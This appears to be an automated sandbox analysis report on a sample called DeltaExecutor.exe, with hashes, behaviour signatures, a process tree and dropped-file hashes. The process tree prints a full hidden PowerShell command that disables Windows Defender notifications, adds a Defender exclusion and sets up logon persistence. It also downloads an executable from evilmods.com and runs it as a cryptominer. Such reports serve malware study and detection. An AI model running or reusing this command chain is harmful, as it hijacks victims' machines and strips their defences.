Resubmissions
01-01-2025 20:08
250101-yw3eystrcl 801-01-2025 20:04
250101-ytbt8a1qe1 801-01-2025 20:01
250101-yrhvra1pgx 801-01-2025 14:10
250101-rgpf8axnaw 10Analysis
-
max time kernel
121s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
01-01-2025 20:08
General
-
Target
DeltaExecutor.exe
-
Size
169KB
-
MD5
a614a895161a44b174f8b0c5e0d94adf
-
SHA1
1594a374c81ee36ce6dcff56f13169c4400b8714
-
SHA256
d6f67c596a3017fab0f6908f38de0f996fe8742dc7131d491343d128d96564f6
-
SHA512
3e7f9116b528ff8a2aef56f006f8f5c231dcd0fd3e951ce4b3a0582a4429836bcded1469ba7c3ff41d59bafcee05d77150ced675c8b9fe69f17ff734de5ee981
-
SSDEEP
3072:nczkitvo4BpYN/6mBPry8TXROLdW5m4mUR59OOGJ0kA30165M1fSV:nA4NCmBPry/N2lOOYg0kWE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg22⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1q7cpwxjatrtpa29u85tayvggs67f6fxwyggm8kd.eJltBgON9D --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD555540a230bdab55187a841cfe1aa1545
SHA1363e4734f757bdeb89868efe94907774a327695e
SHA256d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb
SHA512c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5c6150925cfea5941ddc7ff2a0a506692
SHA19e99a48a9960b14926bb7f3b02e22da2b0ab7280
SHA25628689b30e4c306aab53b027b29e36ad6dd1dcf4b953994482ca84bdc1ecac996
SHA512b3bd41385d72148e03f453e76a45fcd2111a22eff3c7f1e78e41f6744735444e058144ed68af88654ee62b0f117949f35739daad6ad765b8cde1cff92ed2d00c
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
Filesize
230B
MD5160f8efdd395a02ca10dc34e874055db
SHA16c023cf94e73c61a2b0a88d98b6a83324fa40ae6
SHA256aeaa93a112c0d4447d7bdb219ce0bae3bb320dc3a2856be78e56e8547b8b585e
SHA512fe6b91b0f7e555d3c8c1a97b717031eea5c079ed1cf6c49a434ada4e0d6150ee2461a5e635e4c479ca4c230ee514bfdf4d336c2641aa8cbd5e6a41d8b1f36cd6
-
Filesize
252B
MD5a95cc260eec1d4f59bee59276e6a9511
SHA1955fbd258bada5efbaccdaebf327782e9b4177ec
SHA2563d53556211e4a71de8ab9755e09aee3ee14323a4b56827e298e64100eb95a1cb
SHA5128724a9c2bda3c75555df97a3d204a8327363af4e09ea1f2d994d2bf029f66bff80b7172829049985b77001a4cebf11bd2be49bff591aa0c022c236509a9bbfdb
-
Filesize
342B
MD5c7b26a79661a5b66c309ac31d08f75bf
SHA191e9c676db9dfab3a13e6214ea74a37ab6c2a26c
SHA25699a2950a345dddab9a59e25bce90fe6c66861e5376a1947d1a1a89be6909c266
SHA512b417e812c084e82230e50f08c6f5f21a6754e9a89f545b77240ae0c7a98caeb8900d06a56bf7817040dc8e8af3fc68fa20b023493c9a4de3b5a9a426ffe120fd
-
Filesize
342B
MD5776eb60a8a0f6a9a269b31d124e14f4e
SHA16ad509f1448a7a166b8a059e5bbaf0f5a22de1a3
SHA2562290672cad72c49917d25d3944edb07dfb6f122acc123f05f31f5fd796058e79
SHA5125e3e90612b920850c2e2a64a8d7744b7d2be57ee50b3d85868446d519bd72c75ed26a7ca9711e7dab0b911e1d26aee6e90395d41f0d3746e07c1867dbacbedc9
-
Filesize
342B
MD5e26c43d7cd6f70d45327df7d6cdd5882
SHA1144659c1d8fe352cd7fcf1edb85842e5e86bc60f
SHA256a32285386e5890d640707695763013d64ba9dc7e867bf5c20e12b502b6530751
SHA5122c5bb2f3df56d6b5865758e495c63d05b7386c8ca9e83f61d03a03298bc874636137d2a3f0c49a40e17b479e553222b01d9c519c63d2083fa1984750aa8eabc6
-
Filesize
342B
MD52c9c735d09980964f3477c01d967b29f
SHA19a2e11796e2af386d928938b6886278c962aeebd
SHA2563b0602d1a7b826fa966f9385e01e3fcd805af69d2ab7315f94c40a07eb903084
SHA512af806d5099987d9e3522f97da2abec317b4d5a2d9147fda454dd127e991cbcf65e7649295b0c2dd04945c15c2ef99fb70b56d1c1c7d4d52ac93471337afd895e
-
Filesize
342B
MD5d6b5f10c109334154d98cbdde476db0d
SHA1779d4fef0c4d02c4c03975149aa8028f7120b348
SHA256df25fc355989eaceae51d4bcdc6583c5c47d94e822d54c83263660c000e5a1b9
SHA51236372e4f73be697be32e89fbeeae3c7d79e10f8aa170444cd513e452418860eeea27d4d08a15e8b98a2c0db44fb0f40e97eecbe1399cbb1411848fee7d957f0a
-
Filesize
342B
MD52e1db8389c064d2d6fc28a359452f7ef
SHA17cce20052a44f1bdda4caac1e0f77831a52672de
SHA256984d103b3c6d93f33640a991cc0e1486717ef0165f51b40597965ee2323deda2
SHA51284c5dff94142f5bdc2f8e33a2f91e61d35fad1c5aff03ad0b8617f3006e0d5e7a6d8286e977c5467e1dbfd6586f75875005deb853138a0e63bf575ca66f4add8
-
Filesize
342B
MD5ce7ce1c2e00338754c670cd8c979253c
SHA1632ddac67b2caa63ddd8b652ebf36b9707cfbf91
SHA25674ebfea76fbb165ca05c7a0a93d44c25d1df12b4e3cdf0f34f7ef8858f948230
SHA512a7f2601280c6e1821a97511663a462c797874a86123773062dcac1ba902ca04b0bf88e3835a840c3037c8e80b7df2c09933707561e113d2468d661dcf8db6af3
-
Filesize
342B
MD57329a3dedf605e900df6882d4967cda9
SHA1e4ed7a518d9b8daf4884c9e3b25718bfce6f2ac3
SHA256159719d09f1681acb72e2e6af68fcf5e3afe1a032e3fe4a5f21c7243472aa8ad
SHA51248199889334f736305b1ab4eb073f98ad9ea99690e809004c9608cadb3e612c21246d86d99f558264df393bebfb967a00d1a4f493b70fe00d27a654d505e970b
-
Filesize
342B
MD5e2cf027ef4a92956eff5a1966ef8bb46
SHA1697c5f2442b30b3ce993fa30c3ef723544d8a979
SHA2562183cdbe6bb342658f6c503c280b8ced5317b84c47bdb0bdab2c452464619b0f
SHA512312f31bda4e2320e06756a0466a2622b6e4e8a2ce2169c17ef7f67c92d33b62eb94ac7b6e51c194e361e978f2850299b6b8a7c93e2d86359db8ba0b4fe1dba15
-
Filesize
342B
MD5d1f4882fe8a76129c1dfa4954012624f
SHA164c250d277ffeccb94ebe6c72d2a6810052dba82
SHA256772e7a9c8166fb04824fc55433eb15c8fdf2f577ecfbc3f7551ac0045f1d003f
SHA5128f02456b9295eb4a3052e50d77a3fdcc7c989fef55dae69d2b3a3e46d96e3e20ca533582d8b0d3166e4862b80d376da1a7d4c1264c49209d25bc963e08703066
-
Filesize
342B
MD566a9435f4636044a226b1f5c7124216d
SHA14ac96d74355079dc7807958f842a79310a95d82b
SHA25639bf1e9e389d98d8fcfc991747f29f4bdf35787fe1625db9cbccfde812872c48
SHA512526a9295fde3e5f35d9faa7f97ab5b89b7257464e73b5b6600132468d8568fd82568ec3d43ea562760beb4966b327f5dce810c032ae95ff85f461551ab2ef7d2
-
Filesize
342B
MD5f297f5329e1c6e7ec1db2df8c7020d7c
SHA1f59827ef07b6d888f78b4c5ee64e7fd814ce7230
SHA256bde883ca62fc3a326fa1c840912f53c8c65562dcd1172711e21f4e05b8b121a6
SHA512015bb4bc44c7b04fa8abc9fef90b6eecf23b6afec6e7434a3d2fb9cea58eb51c1b41e5083b4a66d7f46f921701a97759f361b9ad023cec99d86e1b8f09108392
-
Filesize
342B
MD598b46479eda1804f12136cccf3e6c288
SHA1bdab260ec59dfaa6b0430646357f2626fc49942d
SHA256432f66d5c4c76f1aee98fbf23851311ebccf82abf6ebf5cabe3607119e2ec1a3
SHA512eed9c8e1648289d285ebdf7bba91ccaf92927b512c5d33b1c3c01dcb44dbcafda179a44943c6c160d077a98844961adab2214230bbcd027ec951ddea86af590f
-
Filesize
342B
MD53982183911a6105554c44185de6998ed
SHA16e83c5ce606849d32e82286b9760a672bd957a81
SHA256f631e54bcb2314a3e5db26c76f3bdd1c580d1f1b53a8dea874d2c031377fb080
SHA5123bfb8dbb6c5e380872f72529613426d6bb7aaedac6703b8e3fb03fd9c20d7dc0f48a7cb0aa9cb02735f77a5277262683c48fa6cc4ac8a24e9aab30fb13bdb8cb
-
Filesize
342B
MD5211bc6c02c3ee995295a201edf616160
SHA1b5672a07ff962643e5ec3d814f472fa636f37a5d
SHA256d5d16eaea46c5935ffea90d32fc21aca22fcdb010a6fd1b226db084fcee72894
SHA512ec03c63445174f72b9b182422ee241a813b52d493186416631f7a1b030d245edc9e893dd5c1f5aa94f950778267a4e538589a2851f04f6da2ab7d4cc69bfeca3
-
Filesize
342B
MD53a03313a804e72cf92b623566e05d49c
SHA17711efc8602c1984df9a9fc50f88f0d04dab034d
SHA25649493921e55f9cf1a64db64e8800f01d77a6df19f1dfdcdd00d33c3d57f5fa82
SHA512e3e0d1ddaa7a341eaafdb7426b28d42856405b2330928c9142896fae4e4ea86b5d1dc272b896a80f6704b0ac0cd8d2c0f02c70cc4b95318bea933f75063e7089
-
Filesize
342B
MD52e922cc3e264bc89cf095aec157b5be9
SHA160c3654484a6fa4748ac2c2ee30ac24b4e5495f7
SHA25631a756b7981fd94a39909c7f060fb0c2f4429d4426708c2c8218bfd954957adc
SHA51276928022c671eb345e9e6825fc6f3783cbd01767847b03e072a8113d7bfed10fa46e70f4b8ad960ea3c4f8984e6ff0d833905e95e00a2e55381f9e0af72c69ba
-
Filesize
342B
MD566369f4984b977c25238d86819db9261
SHA18ce6d688b0ead79d94146c9c5bef1638f66b9d29
SHA2565cbee0d3b3997793d231a11254648c6a6091b0c6d71c9df95bf9b4e1e3fcae62
SHA512d98108115c9576e552d88f75db2f7dfb871f722181547a546a02de2808e574efa4024fd297ea44f58df117220dd254e1153258f539d08b233d4765d62e4c274b
-
Filesize
342B
MD50cb66cd6360ee543db2b33d87e886949
SHA1ca776cc931d239b98616363df48a91fc4bc93e6b
SHA256058f3c3b4403b85bdd277a68a742f1991c6943bb66a8391edae35ce0b98b232d
SHA5129d01311fc48a3012a9878d260466c278ee7087a05f32e8fe1c14b29bdfb52355f2db181ece8913ba3f4220ed735ed39a11ea9a37d18ed65e76dd3fed672d6f16
-
Filesize
342B
MD5a721b9fa989f87a3599e55126dc2e13c
SHA14e6573676951b02f22ef6ea110fd655462e86d40
SHA2564e4b33f754d889d2ff567ed6c1aab447812351ab50c904b1cb141bd0a7bbb4dd
SHA512dec8a6609d98648d6fe4f58181087a32e302e2a597ce5ffdaa10b893559755b1c4bf93eacd86f116f9503778c3df9661146fb711baaaf3a1679c19a44edcebcf
-
Filesize
342B
MD5e9e23210e486a98a6be968e2a0d97973
SHA1116dcd8412b98f53a79763f8bbce09182961290f
SHA2568aa462788d076f4cd329b350f84adee89364f902931fb4245d95419e634d352f
SHA5121da7cfcb8aae53313411f2608bad1a50cb5d2af6e5e9ae13f91d77ff975038398abe749076992edf88a6503df06c71c63d3405adb45873130444fc5fac15014e
-
Filesize
342B
MD5d9bc5047800183bdca1ed7f61b329ea3
SHA1c3709fe1cfc8b86ed5ca0fd6aa3e0bf558269c32
SHA256b5e2ba19b40d1cad8b15849403bf17a4b64faa98ade77003c82f976b46521415
SHA512d037a5f1e5a87f5d0473f31f0514c33f7003096e57863b6cf5d07854ba8c8ab2713bdd5dd5b32d9e9f4c0c69fd3e1eef0fa21e9d77433669a28156da2882355e
-
Filesize
342B
MD55704576b8f2b9d7623a7a6aa63561b8a
SHA18087948e2942399ca411d34250aebbe241a06cf9
SHA256612c0e3da7c70696cb62167493f4283dcecb432276a1fe943c2202287b97593a
SHA512c43a1c6d6b0ba755297023bea7dffd3390ed73fbd292efadad6d413f97427c491e64dc35e079cc6521ff7c9c0ea242736e22b104bcda880b89db2755a0519f50
-
Filesize
276B
MD5a68bd2e1db85e9977097b18daa97c5d0
SHA1a81fe106d897797c0dddc0dd87d9d7da958dfa17
SHA2563816f47c6f9fc31f9821e69cd8effa07fb02f6b6004e7ea13d0d247371c33c00
SHA512885034cedbb56f51fdd8124811a450a2c6205bc70d07dc384074037629da2db066ba4db73fbb1428242e9021990138e59263a082d2dcfb1dbf48e91d173dbef0
-
Filesize
242B
MD5c305ae0cfbbb181431e4caf9acd15e07
SHA17aa861fe44e482e38def8edff7a6a242bfea92b1
SHA2561f2d40c860198a3459d8b45647bd6b33e38b49fc74e1e5a66f402f1d39821607
SHA512f96d953805977d9a867e7f60e9637da99adfab3c524eb8a3c3ddc0fd7cd4c6ec6599c21175f38f9e9c2e674c83a3136ab7d799520b4f6911eec5c3fb1d223977
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
4KB